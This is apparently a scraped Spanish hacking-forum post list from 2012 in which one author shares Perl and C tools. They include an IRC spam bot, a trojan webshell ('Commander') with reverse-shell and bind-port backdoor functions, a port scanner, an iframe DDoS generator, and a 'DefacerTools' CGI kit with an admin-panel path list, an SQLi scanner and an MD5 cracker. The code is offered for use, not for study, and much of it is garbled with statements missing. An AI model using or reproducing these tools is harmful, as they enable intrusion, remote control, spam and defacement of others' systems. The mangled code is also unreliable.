| |
|
421
|
Programación / Scripting / [Perl] IRC Spam 0.3
|
en: 19 Enero 2012, 20:34 pm
|
Un simple script para hacer spam molesto a cada uno de los usuarios que esten en en canal , el spam lo pueden editar con una pagina cualquiera o lo que quieran promocionar. #!usr/bin/perl #IRC Spam 0.3 #Coded By Doddy H use IO::Socket; my @msg_users = ( "Hola", "Chau" ); #Spam to users my @msg_canal = ( "Hola a todos", "que ondaaa" ); #Spam to canal my @bots = ( "Jebus", "Ramona" ); #Names of the bots &head; unless ( @ARGV == 2 ) { &sintax; } else { print "\n[+] Connecting\n\n"; if ( my $socket = new IO::Socket::INET( PeerAddr => $ARGV[0], PeerPort => 6667, Proto => "tcp" ) ) { my $nombre = $bots[ rand(@bots) ]; print $socket "NICK $nombre\r\n"; print $socket "USER $nombre 1 1 1 1\r\n"; print $socket "JOIN $ARGV[1]\r\n"; print "[+] Spammer Online\n\n"; while ( my $log = <$socket> ) { if ( $log =~ /^PING(.*)$/i ) { print $socket "PONG $1\r\n"; } if ( $log =~ m/:(.*) 353 (.*) = (.*) :(.*)/ig ) { while (true) { my $pro = $4; print $socket "PRIVMSG $ARGV[1] " . $msg_canal[ rand(@msg_canal) ] . "\r\n"; my @nicks = split " ", $pro; foreach $names (@nicks) { unless ( $nombre eq $names ) { $names =~ s/\@//; "MSG $names $msg_users[rand(@msg_users)]\r\n"; print "[+] Spam : $names !\n"; } } } } } } else { } } ©right; sub sintax { print "\n[+] : $0 <server> <channel>\n"; } sub head { @ @@@@@ @@@@ @@@ @@@@@ @ @ @ @ @ @@@@@ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@ @@ @@ @@ @ @ @ @ @ @ @ @ @ @ @ @ @@ @@ @@ @@ @ @ @ @ @@@@@ @ @@@ @@@@@ @ @ @ @ @ @ @ @ @ @ @@@@ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @@@ @ @ @ @ @ @ @ @@@@@ @ @ ); } sub copyright { print "\n\n(C) Doddy Hackman 2012\n\n"; } # The End ?
|
|
|
|
|
422
|
Programación / Scripting / [Perl] Commander 0.3
|
en: 19 Enero 2012, 20:34 pm
|
Una mejora de un troyano al estilo webshell que habia hecho el verano pasado. #!usr/bin/perl # #C0mmand3r (C) Doddy HAckman 2012 #Version 0.3 # #A simple WebShell in Perl # # use IO::Socket; use CGI; use Cwd; use Win32; my $port = rep(); sub rep { unless ( $ARGV[0] ) { } else { } } print "\n\n#########################################\n\n"; print "C0mmand3r (C) Doddy HAckman 2012\n\n\n"; print "[+] Starting the webshell on port $port\n\n"; print "#########################################\n\n"; my $sock = new IO::Socket::INET( LocalHost => 'localhost', LocalPort => $port, Proto => 'tcp', Listen => SOMAXCONN, Reuse => 1 ); while ( $jebus = $sock->accept() ) { print $jebus "HTTP/1.1 200/OK\r\nContent-type:text/html\r\n\r\n"; #print $jebus "HTTP/1.1 200/OK\r\nContent-type:application/w-www-form-urlencoded\r\n\r\n"; while ( $response = <$jebus> ) { my %rta; if ( $response =~ /GET/ig ) { capturar($response); } sub capturar { if ( $aa =~ /GET \/(.*) HTTP\/1.1/ig ) { my $todo = $1; if ( $todo =~ /\?(.*)=(.*)&(.*)=(.*)/ig ) { $rta{$1} = $2; $rta{$3} = $4; } if ( $todo =~ /\?(.*)=(.*)/ig ) { $rta{$1} = $2; } } } <style type=text/css> .main { margin : -287px 0px 0px -490px; border : White solid 1px; BORDER-COLOR: #00FF00; } #pie { position: absolute; bottom: 0; } body,a:link { font: normal 16px Verdana, Arial, Helvetica, sans-serif; background-color: #000000; color:#00FF00; Courier New; cursor:crosshair; font-size: small; } input,table.outset,table.bord,table,textarea,select,fieldset { background-color:black;color:#00FF00; border: solid 1px #00FF00; border-color:#00FF00 } a:link,a:visited,a:active { color: #00FF00; font: normal 16px Verdana, Arial, Helvetica, sans-serif; text-decoration: none; } </style> "; if ( $rta{'info'} ) { info(); print $jebus "<center><br><br><b>IP : </b>" . get_ip () . "<br>"; print $jebus "<center><br><br><b>Domain : </b>" . Win32::DomainName() . "<br>"; print $jebus "<b>Chip : </b>" . Win32 ::GetChipName() . "<br>"; print $jebus "<b>OS : </b>" . Win32 ::GetOSName() . "<br>"; print $jebus "<b>Version : </b>" . Win32 ::GetOSVersion() . "<br>"; print $jebus "<b>User : </b>" . Win32::LoginName() . "<br><br></center>"; copyright(); } elsif ( $rta{'console'} ) { logouno(); <br><br><center> <form action='' method=GET> Command : <input type=text name=cmd value=ver><input type=submit value=Execute> </center></form><br><br> "; copyright(); } elsif ( $rta{'cmd'} ) { logouno(); $lucha = $rta{'cmd'}; print $jebus "<br><br><center><fieldset>"; $lucha =~ s/\+/ /; print $jebus "<br>[+] Command : <b>$lucha</b><br><br>"; print $jebus "</center></fieldset>"; copyright(); } elsif ( $rta{'reverse'} ) { logodos(); <center> <br><br><b>ReverseShell</b><br><br> <form action='' method=GET> <b>Your IP</B> : <input type=text name=ipconnect value=localhost><br> <b>Port</b> : <input type=text name=port value=666><br> <br><input type=submit value=Connect></form><br><br> </center> ); copyright(); } elsif ( $rta{'ipconnect'} ) { conectar( $rta{'ipconnect'}, $rta{'port'} ); tipo(); sub conectar { connect( REVERSE , sockaddr_in ( $_[1], inet_aton ( $_[0] ) ) ); open( STDIN, ">&REVERSE" ); open( STDOUT, ">&REVERSE" ); open( STDERR, ">&REVERSE" ); } sub tipo { print "\n[*] Reverse Shell Starting...\n\n"; if ( $^O =~ /Win32/ig ) { infowin(); } else { infolinux(); #root(); system("export TERM=xterm;exec sh -i"); } } sub infowin { print "[+] Domain Name : " . Win32 ::DomainName() . "\n"; print "[+] OS Version : " . Win32 ::GetOSName() . "\n"; print "[+] Username : " . Win32 ::LoginName() . "\n\n\n"; } sub infolinux { print "[+] System information\n\n"; } } elsif ( $rta{'backdoor'} ) { logotres(); <center> <br><br><b>BindPort</b><br><br> <form action='' method=GET> <b>Port</b> : <input type=text name=portbind value=666><br> <br><input type=submit value=Bind></form><br><br> </center> ); copyright(); } elsif ( $rta{'portbind'} ) { $backdoor = IO::Socket::INET->new( Proto => 'tcp', LocalPort => $rta{'portbind'}, Listen => SOMAXC, Reuse => 1 ); while ( $jesus = $backdoor->accept() ) { $jesus->autoflush(1); "[*] Heaven_Door Online\n[*] Port : 25256\n[*] PID : " . $$ . "\n\n"; print $jesus "Welcome " . $jesus->peerhost . "\n\n"; &extras; $dir = getcwd(); print $jesus $dir . ">>"; while (<$jesus>) { print $jesus "\n\n" . $yeah . "\n\n"; print $jesus $dir . ">>"; } } sub extras { if ( $^O =~ //ig ) { print $jesus "[+] Domain Name : " . Win32::DomainName() . "\n"; print $jesus "[+] OS Version : " . Win32::GetOSName() . "\n"; print $jesus "[+] Username : " . Win32::LoginName() . "\n\n\n"; } else { print $jesus "--==System Info==--\n\n" . $s; } } } elsif ( $rta{'about'} ) { about(); <pre><center> ¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾ ¾¾¾¾ ¾¾¾¾¾¾ ¾¾¾¾ ¾¾¾ ¾¾¾ ¾¾¾ ¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾ ¾¾¾¾ ¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾ ¾ ¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾ ¾¾¾¾¾¾¾¾¾¾ ¾ ¾ ¾ ¾¾¾¾ ¾ ¾ ¾ ¾¾ ¾¾ ¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾ ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾ ¾¾¾ ¾¾¾¾¾¾¾¾¾ ¾¾¾ ¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾ ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾ ¾¾¾¾¾¾ ¾¾¾¾ ¾¾¾¾ </pre></center> ); copyright(); } else { <title>Commander 0.3 (C) Doddy Hackman 2012</title> <br><br> <h1><center>Commander</center></h1> <br><br> <center> <table border=1> <td class=main><center><b>Tools</b></center></td><tr> <td class=main><a href=?info=true><center>Information</center></a></td><tr> <td class=main><a href=?console=true><center>Console</center></a></td><tr> <td class=main><a href=?backdoor=true><center>Backdoor</center></a></td><tr> <td class=main><a href=?reverse=true><center>ReverseShell</center></a></td><tr> <td class=main><a href=?about=true><center>About</center></a></td> </table> </center> "; copyright(); } $jebus->close; } } continue { $jebus->close; } sub logouno { <pre><center> @@@@@@@@ @@ @@ @@ @@ @@ @@ @@ @@@@@@ @@ @@@@ @@@@ @@@@@@ @@ @@@@@@ @@ @@ @@ @@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@@@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@@@ @@@@@@ @@ @@ @@@@ @@@@@@ @@ @@@@@@ </pre></center> ); } sub logodos { <pre><center> @@@@@@@@@@ @@ @@ @@ @@ @@ @@ @@@@@@ @@ @@ @@@@@@ @@@@ @@@@ @@@@@@ @@@@@@@@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@@@@@ @@ @@ @@@@@@@@@@ @@ @@ @@@@@@@@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@ @@ @@@@@@ @@ @@@@ @@@@@@ </pre></center> ); } sub logotres { <pre><center> @@@@@@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@ @@@@@@ @@ @@ @@@@@@@@ @@@@@@ @@@@@@ @@@@ @@@@@@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@@@ @@ @@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@@@ @@@@@@@@ @@@@@@ @@ @@ @@@@@@@@ @@@@@@ @@@@@@ @@ </pre></center> ); } sub about { <pre><center> @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@@@ @@@@@@ @@ @@ @@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@@@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@ @@ @@ @@ @@@@@@@@ @@@@@@ @@@@ @@ @@ </pre></center> ); } sub info { <pre><center> @@ @@ @@ @@@@@@@@@@ @@@@@@@@ @@ @@@@ @@ @@ @@ @@ @@ @@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@ @@ @@ @@ @@ @@ @@@@ @@ @@ @@ @@ @@ @@ @@ @@@@@@@@ </pre></center> ); } sub get_ip { } sub copyright { "<br><br><br><br><center><h1>Coded By Doddy H</h2></center><br><br>"; } # The End ?
|
|
|
|
|
423
|
Programación / Programación C/C++ / [C] ScanPort
|
en: 8 Enero 2012, 18:42 pm
|
Un simple programa para scannear puertos, solo funciona bajo linux. /** * ScanPort 0.1 * Coded by Doddy H **/ #include<stdio.h> #include<sys/socket.h> #include<sys/types.h> #include<stdlib.h> #include<netdb.h> void head() { printf("\n-- == ScanPort 0.1 == --\n"); } void end() { printf("\n\nWritten By Doddy H\n\n"); } int main(int argc,char **argv) { char *ip; int port,control,partedos,portstart,portend; struct sockaddr_in parteuno; head(); if(argc != 4) { printf("\n[+] sintax : port <ip> <portstart> <portend>"); } else { ip = argv[1]; portstart = atoi(argv [2]); printf("\n[+] Scanning %s\n",ip ); printf("\n[+] Parameters : %d-%d\n",portstart ,portend ); for(port=portstart;port<portend;port++) { parteuno.sin_family=AF_INET; parteuno.sin_port=htons(port); parteuno.sin_addr.s_addr=inet_addr(ip); partedos=socket(AF_INET,SOCK_STREAM,0); control=connect(partedos,(struct sockaddr_in *)&parteuno,sizeof(parteuno)); if(control>=0) { printf("\n[+] Port Found : %d",port ); } } } end(); return 0; } /** The End ? **/
|
|
|
|
|
424
|
Programación / Programación C/C++ / [C] ResolveIP
|
en: 8 Enero 2012, 18:41 pm
|
Un simple programa para saber la IP de cualquier host. /** * ResolveIP 0.1 * Written By Doddy H * Thanks to CrashCool */ #include <winsock.h> #include <stdio.h> void head() { printf("\n -- == ResolveIP 0.1 == --\n\n"); } void end() { printf("\n\n -- == Written By Doddy H == --\n"); } int main(int argc, char *argv[]) { char *dom,*host,*ip; struct hostent *parteuno; WSADATA partedos; head(); if(argc != 2) { printf("\n[+] Sintax : resolve <host>\n"); } else { dom = argv[1]; WSAStartup(MAKEWORD(1,1),&partedos); parteuno = gethostbyname(dom); if(parteuno==NULL) { end(); } host = parteuno->h_name; ip = inet_ntoa(*((struct in_addr *)parteuno->h_addr)); printf("\n[+] HOST : %s",host ); } end(); return 0; } /* The End */
|
|
|
|
|
425
|
Programación / Programación C/C++ / [C] Manager
|
en: 8 Enero 2012, 18:40 pm
|
Un simple programa para manejar los procesos de Windows. /** Simple process manager Coded By Doddy H **/ #include <windows.h> #include <Tlhelp32.h> #include <stdio.h> int main() { HANDLE parteuno,partedos; PROCESSENTRY32 control; int re,pid; printf("\n\n-- == Manager == --\n\n"); printf("2 - Close Process\n"); while(1) { if (re==1) { printf("\n[+] Getting process..\n\n"); parteuno = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); Process32First(parteuno,&control); while(Process32Next(parteuno,&control)){ printf("[+] Process : %s \n",control. szExeFile); printf("[+] PID : %i\n\n",control. th32ProcessID); } CloseHandle(parteuno); } else if (re==2) { partedos =OpenProcess(PROCESS_TERMINATE,0,pid); if (TerminateProcess(partedos,0)) { printf("\n[+] Process Closed\n\n"); } else { } CloseHandle(partedos); } else if (re==3) { printf("\n\nWritten By Doddy H\n\n"); } } return 0; } /** The End ? **/
|
|
|
|
|
426
|
Programación / Programación C/C++ / [C] Iframe DDOS
|
en: 8 Enero 2012, 18:38 pm
|
Un simple POC para iframe DDOS /** * Simple POC for IFRAME DDOS * Coded By Doddy H */ #include <stdio.h> void head() { printf("\n -- == IFRAME DDOS 0.1 == --\n\n"); } void end() { printf("\n\n -- == Coded By Doddy H == --\n"); } int main ( int argc, char **argv ) { char *target; int i,count; FILE *archivo; head(); if(argc != 3) { printf("\n[+] Sintax : ddos <target> <count>\n"); } else { target = argv[1]; printf("\n[+] Starting the party"); archivo = fopen ("poc.html","a+"); for(i=0;i<=count;i++) { fprintf(archivo ,"%s","<iframe src='"); fprintf(archivo ,"%s","' width='3' height='3'></iframe><br>\n"); } } end(); return 0; } /** The End ? */
|
|
|
|
|
427
|
Programación / Programación C/C++ / [C] Hex Converter
|
en: 8 Enero 2012, 18:37 pm
|
Un simple programa para convertir texto en hex /** * Hex Converter * Coded By Doddy H * Based in hex encoder by Ka0x */ #include <stdio.h> #include <string.h> void head() { printf("\n -- == Hex Converter == --\n\n"); } void end() { printf("\n\n\n -- == Coded By Doddy H == --\n"); } int main ( int argc, char **argv ) { char *text; int i,total; head(); if(argc != 2) { printf("\n[+] Sintax : hex <text>"); } else { text = argv[1]; printf("\n[Text] : %s\n",text ); for(i=0;i<total;i++){ } } end(); return 0; } /** The End ? */
|
|
|
|
|
428
|
Programación / Scripting / [Perl] DefacerTools 0.5 (regalo de navidad)
|
en: 11 Diciembre 2011, 01:03 am
|
Hola aca les traigo un regalo de navidad que hice en 3 horas , es un programa en CGI para usar en webs que soporten el mismo , yo hice todas las pruebas con xampp y al parecer todo funciona bien. Las funciones del programa son : - HexConverter
- PanelFinder
- PathsFinder
- SQLi Scanner
- FuzzDNS
- FinderPass
- PortScanner
El codigo del programa (formateado con perltidy) es defacertools.cgi#!"\xampp\perl\bin\perl.exe" # #DefacerTools 0.5 # #(C) Doddy Hackman 2012 # # use CGI; use LWP::UserAgent; use URI ::Split qw(uri_split ); use HTML::LinkExtor; use IO::Socket; @panels = ( 'admin/admin.asp', 'admin/login.asp', 'admin/index.asp', 'admin/admin.aspx', 'admin/login.aspx', 'admin/index.aspx', 'admin/webmaster.asp', 'admin/webmaster.aspx', 'asp/admin/index.asp', 'asp/admin/index.aspx', 'asp/admin/admin.asp', 'asp/admin/admin.aspx', 'asp/admin/webmaster.asp', 'asp/admin/webmaster.aspx', 'admin/', 'login.asp', 'login.aspx', 'admin.asp', 'admin.aspx', 'webmaster.aspx', 'webmaster.asp', 'login/index.asp', 'login/index.aspx', 'login/login.asp', 'login/login.aspx', 'login/admin.asp', 'login/admin.aspx', 'administracion/index.asp', 'administracion/index.aspx', 'administracion/login.asp', 'administracion/login.aspx', 'administracion/webmaster.asp', 'administracion/webmaster.aspx', 'administracion/admin.asp', 'administracion/admin.aspx', 'php/admin/', 'admin/admin.php', 'admin/index.php', 'admin/login.php', 'admin/system.php', 'admin/ingresar.php', 'admin/administrador.php', 'admin/default.php', 'administracion/', 'administracion/index.php', 'administracion/login.php', 'administracion/ingresar.php', 'administracion/admin.php', 'administration/', 'administration/index.php', 'administration/login.php', 'administrator/index.php', 'administrator/login.php', 'administrator/system.php', 'system/', 'system/login.php', 'admin.php', 'login.php', 'administrador.php', 'administration.php', 'administrator.php', 'admin1.html', 'admin1.php', 'admin2.php', 'admin2.html', 'yonetim.php', 'yonetim.html', 'yonetici.php', 'yonetici.html', 'adm/', 'admin/account.php', 'admin/account.html', 'admin/index.html', 'admin/login.html', 'admin/home.php', 'admin/controlpanel.html', 'admin/controlpanel.php', 'admin.html', 'admin/cp.php', 'admin/cp.html', 'cp.php', 'cp.html', 'administrator/', 'administrator/index.html', 'administrator/login.html', 'administrator/account.html', 'administrator/account.php', 'administrator.html', 'login.html', 'modelsearch/login.php', 'moderator.php', 'moderator.html', 'moderator/login.php', 'moderator/login.html', 'moderator/admin.php', 'moderator/admin.html', 'moderator/', 'account.php', 'account.html', 'controlpanel/', 'controlpanel.php', 'controlpanel.html', 'admincontrol.php', 'admincontrol.html', 'adminpanel.php', 'adminpanel.html', 'admin1.asp', 'admin2.asp', 'yonetim.asp', 'yonetici.asp', 'admin/account.asp', 'admin/home.asp', 'admin/controlpanel.asp', 'admin/cp.asp', 'cp.asp', 'administrator/index.asp', 'administrator/login.asp', 'administrator/account.asp', 'administrator.asp', 'modelsearch/login.asp', 'moderator.asp', 'moderator/login.asp', 'moderator/admin.asp', 'account.asp', 'controlpanel.asp', 'admincontrol.asp', 'adminpanel.asp', 'fileadmin/', 'fileadmin.php', 'fileadmin.asp', 'fileadmin.html', 'administration.html', 'sysadmin.php', 'sysadmin.html', 'phpmyadmin/', 'myadmin/', 'sysadmin.asp', 'sysadmin/', 'ur-admin.asp', 'ur-admin.php', 'ur-admin.html', 'ur-admin/', 'Server.php', 'Server.html', 'Server.asp', 'Server/', 'wp-admin/', 'administr8.php', 'administr8.html', 'administr8/', 'administr8.asp', 'webadmin/', 'webadmin.php', 'webadmin.asp', 'webadmin.html', 'administratie/', 'admins/', 'admins.php', 'admins.asp', 'admins.html', 'administrivia/', 'Database_Administration/', 'WebAdmin/', 'useradmin/', 'sysadmins/', 'admin1/', 'system-administration/', 'administrators/', 'pgadmin/', 'directadmin/', 'staradmin/', 'ServerAdministrator/', 'SysAdmin/', 'administer/', 'LiveUser_Admin/', 'sys-admin/', 'typo3/', 'panel/', 'cpanel/', 'cPanel/', 'cpanel_file/', 'platz_login/', 'rcLogin/', 'blogindex/', 'formslogin/', 'autologin/', 'support_login/', 'meta_login/', 'manuallogin/', 'simpleLogin/', 'loginflat/', 'utility_login/', 'showlogin/', 'memlogin/', 'members/', 'login-redirect/', 'sub-login/', 'wp-login/', 'login1/', 'dir-login/', 'login_db/', 'xlogin/', 'smblogin/', 'customer_login/', 'UserLogin/', 'login-us/', 'acct_login/', 'admin_area/', 'bigadmin/', 'project-admins/', 'phppgadmin/', 'pureadmin/', 'sql-admin/', 'radmind/', 'openvpnadmin/', 'wizmysqladmin/', 'vadmind/', 'ezsqliteadmin/', 'hpwebjetadmin/', 'newsadmin/', 'adminpro/', 'Lotus_Domino_Admin/', 'bbadmin/', 'vmailadmin/', 'Indy_admin/', 'ccp14admin/', 'irc-macadmin/', 'banneradmin/', 'sshadmin/', 'phpldapadmin/', 'macadmin/', 'administratoraccounts/', 'admin4_account/', 'admin4_colon/', 'radmind-1/', 'Super-Admin/', 'AdminTools/', 'cmsadmin/', 'SysAdmin2/', 'globes_admin/', 'cadmins/', 'phpSQLiteAdmin/', 'navSiteAdmin/', 'server_admin_small/', 'logo_sysadmin/', 'server/', 'database_administration/', 'power_user/', 'system_administration/', 'ss_vms_admin_sm/' ); my @dns = ('www'); #my @dns = ('www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','s#ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc'); my $nave = LWP::UserAgent->new; $nave->agent( "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12" ); $nave->timeout(5); my %rta; my $que = new CGI; my @ques = $que->param; for (@ques) { $rta{$_} = $que->param($_); } print "Content-type:text/html\n\n"; <style type=text/css> .main { margin : -287px 0px 0px -490px; border : White solid 1px; BORDER-COLOR: #00FF00; } #pie { position: absolute; bottom: 0; } body,a:link { font: normal 16px Verdana, Arial, Helvetica, sans-serif; background-color: #000000; color:#00FF00; Courier New; cursor:crosshair; font-size: small; } input,table.outset,table.bord,table,textarea,select { background-color:black;color:#00FF00; border: solid 1px #00FF00; border-color:#00FF00 } a:link,a:visited,a:active { color: #00FF00; font: normal 16px Verdana, Arial, Helvetica, sans-serif; text-decoration: none; } </style>"; if ( $rta{'hex'} ) { logouno(); qq(<form method =post action =''><b>Text to encode : </b ><input type =text name =textocode value =test ><input type =submit name =codificar value =Encode ></form >); copyright(); } elsif ( $rta{'textocode'} ) { logouno(); print "[+] Encode : <b>" . encode ( $rta{'textocode'} ) . "</b><br><br>"; copyright(); } elsif ( $rta{'panelfinder'} ) { logodos(); qq(<form method =post action =''><b>Page : </b ><input type =text name =buscarpanel value =http ://localhost /><input type =submit value =Find ></form >); copyright(); } elsif ( $rta{'buscarpanel'} ) { my $page = $rta{'buscarpanel'}; logodos(); print "<br>[+] Scanning $page<br><br>"; for $path (@panels) { $code = tomax( $page . "/" . $path ); if ( $code->is_success ) { print "[Link] : " . $page . "/" . $path . "<br>"; } } print "<br><br>[+] Finish<br>"; copyright(); } elsif ( $rta{'pathsfinder'} ) { logotres(); qq(<form method =post action =''><b>Page : </b ><input type =text name =buscarpaths value =http ://localhost /doddy ><input type =submit name =codificar value =Find ></form >); copyright(); } elsif ( $rta{'buscarpaths'} ) { logotres(); my $page = $rta{'buscarpaths'}; my $code = toma($page); my @links = get_links($code); print "<br><br>[+] Finding paths<br><br>"; for my $com (@links) { my ( $scheme, $auth, $path, $query, $frag ) = uri_split($page); if ( $path =~ /\/(.*)$/ ) { my $path1 = $1; $page =~ s/$path1//ig; my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com); if ( $path =~ /(.*)\// ) { my $parche = $1; unless ( $repetidos =~ /$parche/ ) { $repetidos .= " " . $parche; my $code = toma( "http://" . $auth . $parche ); if ( $code =~ /Index of (.*)</ig ) { my $dir_found = $1; print "[+] Directory Found : $page/$dir_found<br>"; } } } } } print "<br><br>[+]Finished<br>"; copyright(); } elsif ( $rta{'sqliscanner'} ) { logocuatro(); qq(<form method =post action =''><b>Page : </b ><input type =text name =buscarsql value =http ://localhost /sql .php ?id =><input type =submit name =codificar value =Scan ></form >); copyright(); } elsif ( $rta{'buscarsql'} ) { logocuatro(); print "<br><br>[+] Scanning page<br><br>"; &length( $rta{'buscarsql'} ); print "<br><br>[+] Finished"; copyright(); } elsif ( $rta{'fuzzdns'} ) { logocinco(); qq(<form method =post action =''><b>Host : </b ><input type =text name =buscardns value =google .com ><input type =submit name =codificar value =Scan ></form >); copyright(); } elsif ( $rta{'buscardns'} ) { logocinco(); my $page = $rta{'buscardns'}; print "<br><br>[+] Searching DNS to " . $page . ".....<br><br><br>"; for my $path (@dns) { $code = tomax( "http://" . $path . "." . $page ); if ( $code->is_success ) { print "[+] Found : http://" . $path . "." . $page . "<br>"; } } print "<br><br>[+] Finished<br><br>"; copyright(); } elsif ( $rta{'finderpass'} ) { logoseis(); qq(<form method =post action =''><b>MD5 : </b ><input type =text name =buscarhash value =202cb962ac59075b964b07152d234b70 ><input type =submit name =codificar value =Scan ></form >); copyright(); } elsif ( $rta{'buscarhash'} ) { logoseis(); &crackit( $rta{'buscarhash'} ); copyright(); } elsif ( $rta{'portscanner'} ) { logosiete(); qq(<form method =post action =''><b>IP : </b ><input type =text name =buscarpuertos value =localhost ><input type =submit name =codificar value =Scan ></form >); copyright(); } elsif ( $rta{'buscarpuertos'} ) { logosiete(); scanuno( $rta{'buscarpuertos'} ); copyright(); } elsif ( $rta{'home'} ) { sintax(); } else { sintax(); } sub sintax { <title>DefacerTools 0.5 (C) Doddy Hackman 2012</title> <br><br> <h1><center>DefacerTools</center></h1> <br><br> <center> <table border=1> <td class=main><center><b>Tools</b></center></td><tr> <td class =main ><a href =?hex=true ><center>HexConverter </center ></a ></td ><tr> <td class=main><a href=?panelfinder=true><center>PanelFinder</center></a></td><tr> <td class=main><a href=?pathsfinder=true><center>PathsFinder</center></a></td><tr> <td class=main><a href=?sqliscanner=true><center>SQLi Scanner</center></a></td><tr> <td class=main><a href=?fuzzdns=true><center>FuzzDNS</center></a></td><tr> <td class=main><a href=?finderpass=true><center>FinderPass</center></a></td><tr> <td class=main><a href=?portscanner=true><center>PortScanner</center></a></td> </table> </center> ); } sub logouno { <center> <pre> @ @ @@@@ @ @ @ @ @ @ @ @ @ @ @ @@@ @ @ @ @@@ @ @@ @ @ @@@ @@ @@ @@@ @@ @@@@@@ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @@@@@ @@ @ @ @ @ @ @ @ @@@@@ @ @ @@@@@ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @ @ @@@@ @@@ @ @ @ @@@ @ @ @@@ @ </pre> ); } sub logodos { <center> 